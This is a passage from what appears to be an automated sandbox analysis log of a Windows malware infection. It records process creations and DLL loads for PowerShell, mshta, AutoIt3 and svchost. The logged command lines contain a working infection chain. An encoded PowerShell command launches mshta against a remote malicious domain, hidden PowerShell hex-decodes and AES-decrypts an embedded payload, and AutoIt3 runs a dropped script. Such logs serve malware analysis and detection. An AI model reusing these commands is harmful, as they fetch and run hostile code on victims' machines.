3EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\AutoIt3.exe "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\AutoIt3.exe "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\AutoIt3.exe "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\AutoIt3.exe "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
      Source: C:\Windows\regedit.exeSection loaded: authz.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: aclui.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: clb.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: ntdsapi.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: duser.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: atlthunk.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\regedit.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
